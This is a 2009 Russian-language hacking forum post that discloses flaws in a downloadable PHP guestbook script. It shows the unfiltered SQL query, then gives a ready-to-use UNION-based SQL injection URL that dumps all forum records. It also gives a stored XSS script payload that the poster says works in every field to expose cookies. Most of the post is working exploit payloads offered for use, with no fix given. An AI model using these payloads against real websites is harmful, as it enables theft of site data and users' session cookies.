Показать сообщение отдельно

  #6  
Старый 04.03.2009, 23:54
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Гостевая книга.
код: http://dump.ru/file/1946627

1. SQL inj
бажный код:

PHP код:
$result=mysql_query("SELECT id,msg,ans,author,topic,date,host,email FROM $tb WHERE ans=".$ref." ORDER BY id desc"); 
не фильтруются передаваемые даные.

exploit:
Код:
http://localhost/forum/forum.php?cmd=show&id=-6+union+select+group_concat(concat_ws(0x3a,id,msg,ans,author,topic,date,host,email,url))+from+forum--
татие скули почти во всех параметрах!

2. Активная XSS.

Ну здесь уязвимы все поля...
вл любом из них вводим
Код:
"><script>alert(0x646f63756d656e742e636f6f6b6965)</script>
и видим куки)

Сильно не пинайте, знаю, что гостевая - один сплошной баг, но всеже решил опубликовать...
------------------------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 04.03.2009 в 23:58..
 
Ответить с цитированием